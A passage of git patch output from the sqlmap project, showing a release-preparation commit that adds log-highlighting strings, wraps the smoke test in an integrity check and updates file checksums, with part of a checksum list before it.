+af079de99a8ec6988d28aa4c0aa32cf9 waf/cloudbric.py +8fec83056c8728076ab17ab3a2ebbe7b waf/cloudflare.py +5672c1ae038dcfc523a6d82d9875025c waf/cloudfront.py +847ee97f6e0f8aeec61afd3e0c91543b waf/comodo.py +f7571543ccb671a63a8139e375d6a4f2 waf/crawlprotect.py +f20b14ca9f7c2442fd1e9432d933a75b waf/datapower.py +e49bb75985f60556b4481dc085f3c62b waf/denyall.py +dbe50bbcb1b4664d6cebfcca63e75125 waf/distil.py +2e8bf326975edcb4d627493c46c6807c waf/dosarrest.py +886c6502a6a2aae49921efed8d439f7b waf/dotdefender.py +a8412619d7f26ed6bc9e0b20a57b2324 waf/edgecast.py +17e7ac56629b25a9ea8cfe01c3604745 waf/expressionengine.py +588d2f9a8f201e120e74e508564cb487 waf/fortiweb.py +0e9eb20967d2dde941cca8c663a63e1f waf/generic.py +2aa7775dac8df4a3cdb736fdf51dc9cb waf/hyperguard.py +1adbd0c470d1bbcec370722f05094255 waf/incapsula.py +fb6be55d21a70765e35549af2484f762 waf/__init__.py +a3ee375714987acccc26d1b07c2e8af7 waf/isaserver.py +ce9cf35919a92d65347bb74ca0c5c86f waf/jiasule.py +f44ed04eeb4287c11ce277703ec7d72d waf/knownsec.py +d50d82bec48814eb5b699d302dbdae9a waf/kona.py +10b1c6891494b780d1966e47fca2b58a waf/modsecurity.py +78af8e791207db9723a14bddeb7524af waf/naxsi.py +504ade4d32bdbbd2932eebb07f57c3eb waf/netcontinuum.py +47ef4146cac17e3244bbc1a93fb51942 waf/netscaler.py +84e9c68b6ecffafb5ec8cd96acaf62b9 waf/newdefend.py +69fc40e85751279e9018d643742db04e waf/nsfocus.py +7ff3c93f2c77a984ebbf217c7c38a796 waf/paloalto.py +2979bb64c24256a83625d75a385dde9b waf/profense.py +8de0d46738335a4e498c4ac9038ac3c3 waf/proventia.py +ac60456fe7af4eb501d448910e98ee4b waf/radware.py +dba6a3b52851d2d7a0a1ab83a51caa5a waf/reblaze.py +987389e4f403b7615d6d8006420a6260 waf/requestvalidationmode.py +2a7b234e903d13b3c21d6c17e05d1c46 waf/safe3.py +4382cb217354d816580ee07178d0a8c7 waf/safedog.py +ac0728ddb7a15b46b0eabd78cd661f8c waf/secureiis.py +ba37e1c37fa0e3688873f74183a9cb9c waf/senginx.py +4d79866c7cff0d7650a22d0a85126c05 waf/sitelock.py +a840fcd2bb042694f9aab2859e7c9b30 waf/sonicwall.py +45683bfe7a428f47745416c727a789bd waf/sophos.py +a0aa5997d0d5db18920840220dc4ad36 waf/stingray.py +74bd52941b606d15f1a6cdc7b52f761c waf/sucuri.py +205beb7ed5e70119f8700a9e295b6a4a waf/tencent.py +ef6f83952ce6b5a7bbb19f9b903af2b6 waf/teros.py +ba0fb1e6b815446b9d6f30950900fc80 waf/trafficshield.py +876c746d96193071271cb8b7e00e1422 waf/urlscan.py +45f28286ffd89200d4c9b6d88a7a518f waf/uspses.py +2d9d9fa8359a9f721e4b977d3da52410 waf/varnish.py +67df54343a85fe053226e2a5483b2c64 waf/wallarm.py +6aad5ef252bf428e9bbebe650c0cf67e waf/watchguard.py +c8dcaa89f6cde684a578fdc2e9ab2bb8 waf/webappsecure.py +a7b8c4c3d1463409e0e204932f0ddff0 waf/webknight.py +16e421475ff62b203298e669edca7b40 waf/wordfence.py +e16122cb40e5f3a66cba359cfb672bd2 waf/yundun.py +a560bee3e948b97af2c88805933dcaad waf/yunsuo.py +c8b6517da2c8a28d474956e3a6b8c1ed waf/zenedge.py e68f399aeaa5b516f043af88dd4871a0 xml/banner/generic.xml d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml 7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml From e3134cc96514ad4647cdb9a2e9f5091bb2d69199 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 Jan 2019 23:14:28 +0100 Subject: [PATCH 428/428] Final preparation for 1.3 --- lib/core/settings.py | 2 +- lib/core/testing.py | 72 +++++++++++++++++++++++--------------------- txt/checksum.md5 | 4 +-- 3 files changed, 41 insertions(+), 37 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a25b3b6a72c..505c72a8f48 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -675,7 +675,7 @@ CHECK_ZERO_COLUMNS_THRESHOLD = 10 # Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported") +BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED") # Generic www root directory names GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") diff --git a/lib/core/testing.py b/lib/core/testing.py index 2b121bf68ac..6f8a92a676d 100644 --- a/lib/core/testing.py +++ b/lib/core/testing.py @@ -17,6 +17,7 @@ from extra.beep.beep import beep from lib.controller.controller import start +from lib.core.common import checkIntegrity from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getUnicode @@ -51,41 +52,44 @@ def smokeTest(): retVal = True count, length = 0, 0 - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for filename in files: - if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": - length += 1 - - for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): - if any(_ in root for _ in ("thirdparty", "extra")): - continue - - for filename in files: - if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": - path = os.path.join(root, os.path.splitext(filename)[0]) - path = path.replace(paths.SQLMAP_ROOT_PATH, '.') - path = path.replace(os.sep, '.').lstrip('.') - try: - __import__(path) - module = sys.modules[path] - except Exception, msg: - retVal = False - dataToStdout("\r") - errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg) - logger.error(errMsg) - else: - # Run doc tests - # Reference: http://docs.python.org/library/doctest.html - (failure_count, test_count) = doctest.testmod(module) - if failure_count > 0: + if not checkIntegrity(): + retVal = False + else: + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra")): + continue + + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 + + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra")): + continue + + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + path = os.path.join(root, os.path.splitext(filename)[0]) + path = path.replace(paths.SQLMAP_ROOT_PATH, '.') + path = path.replace(os.sep, '.').lstrip('.') + try: + __import__(path) + module = sys.modules[path] + except Exception, msg: retVal = False - - count += 1 - status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) - dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + dataToStdout("\r") + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), msg) + logger.error(errMsg) + else: + # Run doc tests + # Reference: http://docs.python.org/library/doctest.html + (failure_count, test_count) = doctest.testmod(module) + if failure_count > 0: + retVal = False + + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c27c127756e..47d6c96cc4a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,11 +49,11 @@ fe370021c6bc99daf44b2bfc0d1effb3 lib/core/patch.py 9a7d68d5fa01561500423791f15cc676 lib/core/replication.py 3179d34f371e0295dd4604568fb30bcd lib/core/revision.py d6269c55789f78cf707e09a0f5b45443 lib/core/session.py -43ee2f1b9e898fa8e9788b921f278609 lib/core/settings.py +c799d8dee38e2da35b8aff0638f21129 lib/core/settings.py a8a7501d1e6b21669b858a62e921d191 lib/core/shell.py 5dc606fdf0afefd4b305169c21ab2612 lib/core/subprocessng.py eec3080ba5baca44c6de4595f1c92a0d lib/core/target.py -a057a8ae12fd21f6c409feee1266e7ad lib/core/testing.py +2f87870562ac9a79a5105a0e20fdbf9a lib/core/testing.py 5ebd996b2a77449df90320847e30a073 lib/core/threads.py 2c263c8610667fdc593c50a35ab20f57 lib/core/unescaper.py 5bd7cd6553a4a1c85cbaaddc268108e4 lib/core/update.py
    (7\.0|2000|2005|2008|2008 R2)*(.*?)